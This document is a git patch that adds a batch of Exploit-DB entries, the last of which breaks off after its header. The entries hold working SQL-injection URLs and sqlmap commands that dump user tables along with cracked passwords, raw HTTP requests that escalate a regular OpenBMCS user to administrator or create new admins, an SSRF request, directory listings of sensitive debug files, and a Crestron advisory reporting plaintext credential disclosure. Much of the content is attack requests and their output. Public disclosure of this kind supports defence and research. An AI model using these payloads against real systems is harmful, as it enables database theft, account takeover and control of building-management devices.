From eb2b6f5cfddfba40bf47f1865603224e53490977 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 19 Jan 2022 05:01:58 +0000 Subject: [PATCH] DB: 2022-01-19 12 changes to exploits/shellcodes WorkTime 10.20 Build 4967 - Unquoted Service Path Archeevo 5.0 - Local File Inclusion Online Resort Management System 1.0 - SQLi (Authenticated) OpenBMCS 2.4 - Cross Site Request Forgery (CSRF) OpenBMCS 2.4 - SQLi (Authenticated) OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated) OpenBMCS 2.4 - Information Disclosure Simple Chatbot Application 1.0 - Remote Code Execution (RCE) Simple Chatbot Application 1.0 - 'message' Blind SQLi Nyron 1.0 - SQLi (Unauthenticated) Creston Web Interface 1.0.0.2159 - Credential Disclosure --- exploits/aspx/webapps/50674.txt | 21 +++ exploits/hardware/webapps/50675.txt | 151 +++++++++++++++ exploits/php/webapps/50666.txt | 88 +++++++++ exploits/php/webapps/50667.txt | 54 ++++++ exploits/php/webapps/50668.txt | 73 ++++++++ exploits/php/webapps/50669.txt | 275 ++++++++++++++++++++++++++++ exploits/php/webapps/50670.txt | 95 ++++++++++ exploits/php/webapps/50671.txt | 109 +++++++++++ exploits/php/webapps/50672.txt | 111 +++++++++++ exploits/php/webapps/50673.txt | 37 ++++ exploits/windows/local/50664.txt | 55 ++++++ exploits/windows/remote/50665.txt | 27 +++ files_exploits.csv | 12 ++ 13 files changed, 1108 insertions(+) create mode 100644 exploits/aspx/webapps/50674.txt create mode 100644 exploits/hardware/webapps/50675.txt create mode 100644 exploits/php/webapps/50666.txt create mode 100644 exploits/php/webapps/50667.txt create mode 100644 exploits/php/webapps/50668.txt create mode 100644 exploits/php/webapps/50669.txt create mode 100644 exploits/php/webapps/50670.txt create mode 100644 exploits/php/webapps/50671.txt create mode 100644 exploits/php/webapps/50672.txt create mode 100644 exploits/php/webapps/50673.txt create mode 100644 exploits/windows/local/50664.txt create mode 100644 exploits/windows/remote/50665.txt diff --git a/exploits/aspx/webapps/50674.txt b/exploits/aspx/webapps/50674.txt new file mode 100644 index 000000000..1cb584552 --- /dev/null +++ b/exploits/aspx/webapps/50674.txt @@ -0,0 +1,21 @@ +# Exploit Title: Nyron 1.0 - SQLi (Unauthenticated) +# Google Dork: inurl:"winlib.aspx" +# Date: 01/18/2021 +# Exploit Author: Miguel Santareno +# Vendor Homepage: http://www.wecul.pt/ +# Software Link: http://www.wecul.pt/solucoes/bibliotecas/ +# Version: < 1.0 +# Tested on: windows + +# 1. Description + +Unauthenticated user can exploit SQL Injection vulnerability in thes1 parameter. + + +# 2. Proof of Concept (PoC) + +https://vulnerable_webiste.com/Nyron/Library/Catalog/winlibsrch.aspx?skey=C8AF11631DCA40ADA6DE4C2E323B9989&pag=1&tpp=12&sort=4&cap=&pesq=5&thes1='"> + + +# 3. Research: +https://miguelsantareno.github.io/edp.pdf \ No newline at end of file diff --git a/exploits/hardware/webapps/50675.txt b/exploits/hardware/webapps/50675.txt new file mode 100644 index 000000000..f42be02a6 --- /dev/null +++ b/exploits/hardware/webapps/50675.txt @@ -0,0 +1,151 @@ +# Exploit Title: Creston Web Interface 1.0.0.2159 - Credential Disclosure +# Exploit Author: RedTeam Pentesting GmbH + +Advisory: Credential Disclosure in Web Interface of Crestron Device + + +When the administrative web interface of the Crestron HDMI switcher is +accessed unauthenticated, user credentials are disclosed which are valid +to authenticate to the web interface. + +Details +======= + +Product: Crestron HD-MD4X2-4K-E +Affected Versions: 1.0.0.2159 +Fixed Versions: - +Vulnerability Type: Information Disclosure +Security Risk: high +Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E +Vendor Status: decided not to fix +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009 +Advisory Status: published +CVE: CVE-2022-23178 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178 + + +Introduction +============ + +"Crestron sets the gold standard for network security by leveraging the +most advanced technologies including 802.1x authentication, AES +encryption, Active Directory® credential management, JITC Certification, +SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to +provide network security at the product level." + +(from the vendor's homepage) + + +More Details +============ + +Upon visiting the device's web interface using a web browser, a login +form is displayed requiring to enter username and password to +authenticate. The analysis of sent HTTP traffic revealed that in +addition to the loading of the website, a few more HTTP requests are +automatically triggered. One of the associated responses contains a +username and a password which can be used to authenticate as the +affected user. + + +Proof of Concept +================ + +Requesting the URL "http://crestron.example.com/" via a web browser +results in multiple HTTP requests being sent. Among others, the +following URL is requested: + +------------------------------------------------------------------------ +http://crestron.example.com/aj.html?a=devi&_=[...] +------------------------------------------------------------------------ + +This request results in a response similar to the following: + +------------------------------------------------------------------------ +HTTP/1.0 200 OK +Cache-Control: no-cache +Content-type: text/html + +{ + "login_ur": 0, + "front_val": [ + 0, + 1 + ], + "uname": "admin", + "upassword": "password" +} +------------------------------------------------------------------------ + +The values for the keys "uname" and "upassword" could be used to +successfully authenticate to the web interface as the affected user. + + +Workaround +========== + +Reachability over the network can be restricted for access to the web +interface, for example by using a firewall. + + +Fix +=== + +No fix known. + + +Security Risk +============= + +As user credentials are disclosed to visitors of the web interface they +can directly be used to authenticate to it. The access allows to modify +the device's input and output settings as well as to upload and install +new firmware. Due to ease of exploitation and gain of administrative +access this vulnerability poses a high risk. + + +Timeline +======== + +2021-10-06 Vulnerability identified +2021-11-15 Customer approved disclosure to vendor +2021-12-08 Vendor notified +2021-12-15 Vendor notified again +2021-12-21 Vendor response received: "The device in question doesn't support + Crestron's security practices. We recommend the HD-MD-4KZ alternative." +2021-12-22 Requested confirmation, that the vulnerability will not be addressed. +2021-12-28 Vendor confirms that the vulnerability will not be corrected. +2022-01-12 Advisory released + + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Dennewartstr. 25-27 Fax : +49 241 510081-99 +52068 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/php/webapps/50666.txt b/exploits/php/webapps/50666.txt new file mode 100644 index 000000000..efa9bf019 --- /dev/null +++ b/exploits/php/webapps/50666.txt @@ -0,0 +1,88 @@ +# Exploit Title: Online Resort Management System 1.0 - SQLi (Authenticated) +# Date: 15/01/2022 +# Exploit Author: Gaurav Grover +# Vendor Homepage: +# Software Link: +# Version: 1.0 +# Tested on: Linux and windows both + +Summary: + +There are a vulnerabilities in Online Resort Management System (ORMS) +1. The attacker can easily retrieved the database using sql injection. + +Proof of concepts : + + +Database dump Manualy using SQL Injection, SQL Query & Users detaile are mentioned below: + +1. After login with the admin credentials(Username : admin / Password : admin123) there is a vulnerable parameter name is id= + + +2. Found SQL Injection Parameter :- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2%27order%20by%2010--+ + + +3. http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,2,3,4,5,6,7,8,9,10--+ + + +4. (Database Name :- orms_db) + + Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,database(),3,4,5,6,7,8,9,10--+ + + +5. (Table Name :- activity_list,message_list,reservation_list,room_list,system_info,users + + Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3,4,5,6,7,8,9,10--+ + + +6. (Username Password :- User-1 admin / 0192023a7bbd73250516f069df18b500 , User-2 cblake / 1cd74fae0a3adf459f73bbf187607ccea + + Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(username,password)%20from%20users),3,4,5,6,7,8,9,10--+ + + +------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +Database dump Automated using Sqlmap Tool, SQL Query & Users detaile are mentioned below: + + + +1. Database Name:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -dbs + +available databases [8]: + +[*] clinic_db +[*] information_schema +[*] mtms_db +[*] mysql +[*] orms_db +[*] performance_schema +[*] phpmyadmin +[*] test + + +2- Dump the tables using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db --tables + +Database: mtms +[6 tables] ++------------------+ +| activity_list | +| message_list | +| reservation_list | +| room_list | +| system_info | +| users | ++------------------+ + + + +3- Dump the database using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db -T users --dump + +Database: orms_db +Table: users +[2 entries] ++----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ +| id | type | status | avatar | username | lastname | password | firstname | middlename | last_login | date_added | date_updated | ++----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ +| 1 | 1 | 1 | uploads/avatar-1.png?v=1639468007 | admin | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | Adminstrator | NULL | NULL | 2021-01-20 14:02:37 | 2021-12-14 15:47:08 | +| 5 | 2 | 1 | uploads/avatar-5.png?v=1641622906 | cblake1 | Blake | cd74fae0a3adf459f73bbf187607ccea (cblake) | Claire | NULL | NULL | 2022-01-08 14:21:46 | 2022-01-15 14:01:28 | ++----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/50667.txt b/exploits/php/webapps/50667.txt new file mode 100644 index 000000000..1f3b6e15c --- /dev/null +++ b/exploits/php/webapps/50667.txt @@ -0,0 +1,54 @@ +# Exploit Title: OpenBMCS 2.4 - Cross Site Request Forgery (CSRF) +# Exploit Author: LiquidWorm +# Date: 26/10/2021 + +OpenBMCS 2.4 CSRF Send E-mail + + +Vendor: OPEN BMCS +Product web page: https://www.openbmcs.com +Affected version: 2.4 + +Summary: Building Management & Controls System (BMCS). No matter what the +size of your business, the OpenBMCS software has the ability to expand to +hundreds of controllers. Our product can control and monitor anything from +a garage door to a complete campus wide network, with everything you need +on board. + +Desc: The application interface allows users to perform certain actions via +HTTP requests without performing any validity checks to verify the requests. +This can be exploited to perform certain actions with administrative privileges +if a logged-in user visits a malicious web site. + +Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) + Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) + Apache/2.4.41 (Ubuntu) + Apache/2.4.25 (Debian) + nginx/1.16.1 + PHP/7.4.3 + PHP/7.0.33-0+deb9u9 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5691 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php + + +26.10.2021 + +-- + + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/50668.txt b/exploits/php/webapps/50668.txt new file mode 100644 index 000000000..eb03fcb46 --- /dev/null +++ b/exploits/php/webapps/50668.txt @@ -0,0 +1,73 @@ +# Exploit Title: OpenBMCS 2.4 - SQLi (Authenticated) +# Exploit Author: LiquidWorm +# Date: 26/10/2021 + +OpenBMCS 2.4 Authenticated SQL Injection + + +Vendor: OPEN BMCS +Product web page: https://www.openbmcs.com +Affected version: 2.4 + +Summary: Building Management & Controls System (BMCS). No matter what the +size of your business, the OpenBMCS software has the ability to expand to +hundreds of controllers. Our product can control and monitor anything from +a garage door to a complete campus wide network, with everything you need +on board. + +Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via +the 'id' GET parameter is not properly sanitised before being returned to the +user or used in SQL queries. This can be exploited to manipulate SQL queries +by injecting arbitrary SQL code. + +Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) + Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) + Apache/2.4.41 (Ubuntu) + Apache/2.4.25 (Debian) + nginx/1.16.1 + PHP/7.4.3 + PHP/7.0.33-0+deb9u9 + + +Vulnerability discovered by Semen 'samincube' Rozhkov + @zeroscience + + +Advisory ID: ZSL-2022-5692 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php + + +26.10.2021 + +-- + + +The following PoC request demonstrates the issue (authenticated user session is required): + +GET /debug/obix_test.php?id=1%22 HTTP/1.1 +Host: 192.168.1.222 +Cookie: PHPSESSID=ssid123ssid123ssid1234ssid +Connection: close + + +Response: + +HTTP/1.1 200 OK +Date: Sat, 1 Jan 2022 15:09:54 GMT +Server: Apache/2.4.10 (Debian) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Vary: Accept-Encoding +Content-Length: 629 +Connection: close +Content-Type: text/html; charset=UTF-8 + +
+Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: """' in /var/www/openBMCS/classes/dbconnection.php:146 +Stack trace: +#0 /var/www/openBMCS/classes/dbconnection.php(146): PDO->query('SELECT ip_addre...') +#1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB->querySingle('SELECT ip_addre...', true) +#2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1"', '/obix/config') +#3 {main} + thrown in /var/www/openBMCS/classes/dbconnection.php on line 146
\ No newline at end of file diff --git a/exploits/php/webapps/50669.txt b/exploits/php/webapps/50669.txt new file mode 100644 index 000000000..370193a63 --- /dev/null +++ b/exploits/php/webapps/50669.txt @@ -0,0 +1,275 @@ +# Exploit Title: OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation +# Exploit Author: LiquidWorm +# Date: 26/10/2021 + +OpenBMCS 2.4 Create Admin / Remote Privilege Escalation + + +Vendor: OPEN BMCS +Product web page: https://www.openbmcs.com +Affected version: 2.4 + +Summary: Building Management & Controls System (BMCS). No matter what the +size of your business, the OpenBMCS software has the ability to expand to +hundreds of controllers. Our product can control and monitor anything from +a garage door to a complete campus wide network, with everything you need +on board. + +Desc: The application suffers from an insecure permissions and privilege +escalation vulnerability. A regular user can create administrative users +and/or elevate her privileges by sending an HTTP POST request to specific +PHP scripts in '/plugins/useradmin/' directory. + +Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) + Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) + Apache/2.4.41 (Ubuntu) + Apache/2.4.25 (Debian) + nginx/1.16.1 + PHP/7.4.3 + PHP/7.0.33-0+deb9u9 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5693 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5693.php + + +26.10.2021 + +-- + + +List current ID and permissions (read): +--------------------------------------- + +POST /plugins/useradmin/getUserDetails.php HTTP/1.1 +Host: 192.168.1.222 +Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 +Content-Length: 16 +Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://192.168.1.222 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://192.168.1.222/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +id_list%5B%5D=17 + + +HTTP/1.1 200 OK +Date: Tue, 16 Nov 2021 20:56:53 GMT +Server: Apache/2.4.41 (Ubuntu) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Vary: Accept-Encoding +Content-Length: 692 +Connection: close +Content-Type: text/html; charset=UTF-8 + +[{"user_id":"17","username":"testingus","email":"","expiry_date":null,"fullname":"test","phone":"","module_id":"useradmin","usermodule_permission":"1","permissions":[{"user_id":"17","module_id":"alarms","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"controllers","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"core","permissions":"0","mod_home":"0"},{"user_id":"17","module_id":"graphics","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"history","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"progtool","permissions":"1","mod_home":"0"},{"user_id":"17","module_id":"useradmin","permissions":"1","mod_home":"0"}],"human-date":""}] + + + +List current ID and permissions (admin): +---------------------------------------- + +POST /plugins/useradmin/getUserDetails.php HTTP/1.1 +Host: 192.168.1.222 +Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 +Content-Length: 16 +Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://192.168.1.222 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://192.168.1.222/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +id_list%5B%5D=18 + +HTTP/1.1 200 OK +Date: Tue, 16 Nov 2021 20:56:36 GMT +Server: Apache/2.4.41 (Ubuntu) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Vary: Accept-Encoding +Content-Length: 725 +Connection: close +Content-Type: text/html; charset=UTF-8 + +[{"user_id":"18","username":"testingus2","email":"testingus@test.tld","expiry_date":null,"fullname":"TestName","phone":"1112223333","module_id":"useradmin","usermodule_permission":"4","permissions":[{"user_id":"18","module_id":"alarms","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"controllers","permissions":"2","mod_home":"1"},{"user_id":"18","module_id":"core","permissions":"1","mod_home":"0"},{"user_id":"18","module_id":"graphics","permissions":"4","mod_home":"1"},{"user_id":"18","module_id":"history","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"progtool","permissions":"3","mod_home":"0"},{"user_id":"18","module_id":"useradmin","permissions":"4","mod_home":"0"}],"human-date":""}] + + + +Escalate privileges: +-------------------- + +POST /plugins/useradmin/update_user_permissions.php HTTP/1.1 +Host: 192.168.1.222 +Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 +Content-Length: 702 +Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://192.168.1.222 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://192.168.1.222/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5BmoduleID%5D=useradmin&id=17 + + +HTTP/1.1 200 OK +Date: Tue, 16 Nov 2021 20:58:48 GMT +Server: Apache/2.4.41 (Ubuntu) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 1 +Connection: close +Content-Type: text/html; charset=UTF-8 + +2 + + + +Create admin from read user: +---------------------------- + +POST /plugins/useradmin/create_user.php HTTP/1.1 +Host: 192.168.1.222 +Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 +Content-Length: 1010 +Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://192.168.1.222 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://192.168.1.222/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +user%5Busername%5D=testingus2&user%5Bfullname%5D=TestName&user%5Bphone%5D=1112223333&user%5Bpassword%5D=Password123&user%5BpasswordConfirm%5D=Password123&user%5Bemail%5D=testingus%40test.tld&user%5Bexpiry%5D=&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5Bmod_home%5D=0&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5Bmod_home%5D=0&permissions%5B6%5D%5BmoduleID%5D=useradmin&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5Bmod_home%5D=0 + + +HTTP/1.1 200 OK +Date: Tue, 16 Nov 2021 20:18:58 GMT +Server: Apache/2.4.41 (Ubuntu) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 20 +Connection: close +Content-Type: text/html; charset=UTF-8 + +{"status":"success"} + + + +PoC escalate from editor to admin: +---------------------------------- + + + +
+ + + + + + + + + + + + + + + + + + + + +
+ + + + + +PoC create admin from editor: +----------------------------- + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/50670.txt b/exploits/php/webapps/50670.txt new file mode 100644 index 000000000..ac406904b --- /dev/null +++ b/exploits/php/webapps/50670.txt @@ -0,0 +1,95 @@ +# Exploit Title: OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated) +# Exploit Author: LiquidWorm +# Date: 26/10/2021 + +OpenBMCS 2.4 Unauthenticated SSRF / RFI + + +Vendor: OPEN BMCS +Product web page: https://www.openbmcs.com +Affected version: 2.4 + +Summary: Building Management & Controls System (BMCS). No matter what the +size of your business, the OpenBMCS software has the ability to expand to +hundreds of controllers. Our product can control and monitor anything from +a garage door to a complete campus wide network, with everything you need +on board. + +Desc: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include +(RFI) vulnerability exists in OpenBMCS within its functionalities. The application +parses user supplied data in the POST parameter 'ip' to query a server IP on port +81 by default. Since no validation is carried out on the parameter, an attacker +can specify an external domain and force the application to make an HTTP request +to an arbitrary destination host. This can be used by an external attacker for +example to bypass firewalls and initiate a service and network enumeration on the +internal network through the affected application, allows hijacking the current +session of the user, execute cross-site scripting code or changing the look of +the page and content modification on current display. + +Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) + Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) + Apache/2.4.41 (Ubuntu) + Apache/2.4.25 (Debian) + nginx/1.16.1 + PHP/7.4.3 + PHP/7.0.33-0+deb9u9 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5694 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php + + +26.10.2021 + +-- + + +POST /php/query.php HTTP/1.1 +Host: 192.168.1.222 +Content-Length: 29 +Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://192.168.1.222 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://192.168.1.222/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +ip=www.columbia.edu:80&argu=/ + + +HTTP/1.1 302 Found +Date: Tue, 14 Dec 2021 20:26:47 GMT +Server: Apache/2.4.41 (Ubuntu) +Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Location: ../login.php +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 32141 + + + + + + + + + +Columbia University in the City of New York +... +... \ No newline at end of file diff --git a/exploits/php/webapps/50671.txt b/exploits/php/webapps/50671.txt new file mode 100644 index 000000000..45c2d069f --- /dev/null +++ b/exploits/php/webapps/50671.txt @@ -0,0 +1,109 @@ +# Exploit Title: OpenBMCS 2.4 - Information Disclosure +# Exploit Author: LiquidWorm +# Date: 26/10/2021 + +OpenBMCS 2.4 Secrets Disclosure + + +Vendor: OPEN BMCS +Product web page: https://www.openbmcs.com +Affected version: 2.4 + +Summary: Building Management & Controls System (BMCS). No matter what the +size of your business, the OpenBMCS software has the ability to expand to +hundreds of controllers. Our product can control and monitor anything from +a garage door to a complete campus wide network, with everything you need +on board. + +Desc: The application allows directory listing and information disclosure of +some sensitive files that can allow an attacker to leverage the disclosed +information and gain full BMS access. + +Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) + Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) + Apache/2.4.41 (Ubuntu) + Apache/2.4.25 (Debian) + nginx/1.16.1 + PHP/7.4.3 + PHP/7.0.33-0+deb9u9 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5695 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php + + +26.10.2021 + +-- + + +https://192.168.1.222/debug/ + +Index of /debug + +change_password_sqls +clear_all_watches.php +controllerlog/ +dash/ +dodgy.php +fix_out.php +graphics/ +graphics_diag.php +graphics_ip_diag/ +jace_info.php +kits/ +mysession.php +nuke.php +obix_test.php +print_tree.php +reboot_backdoor.php +rerunSQLUpdates.php +reset_alarm_trigger_times.php +system/ +test_chris_obix.php +timestamp.php +tryEmail.php +trysms.php +unit_testing/ +userlog/ + +... +... + +/cache/ +/classes/ +/config/ +/controllers/ +/core/ +/css/ +/display/ +/fonts/ +/images/ +/js/ +/php/ +/plugins/ +/sounds/ +/temp/ +/tools/ +/core/assets/ +/core/backup/ +/core/crontab/ +/core/font/ +/core/fonts/ +/core/license/ +/core/load/ +/core/logout/ +/core/password/ +/php/audit/ +/php/phpinfo.php +/php/temp/ +/php/templates/ +/php/test/ +/php/weather/ +/plugins/alarms/ +/tools/phpmyadmin/index.php +/tools/migrate.php \ No newline at end of file diff --git a/exploits/php/webapps/50672.txt b/exploits/php/webapps/50672.txt new file mode 100644 index 000000000..74cf94250 --- /dev/null +++ b/exploits/php/webapps/50672.txt @@ -0,0 +1,111 @@ +# Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE) +# Date: 18/01/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: 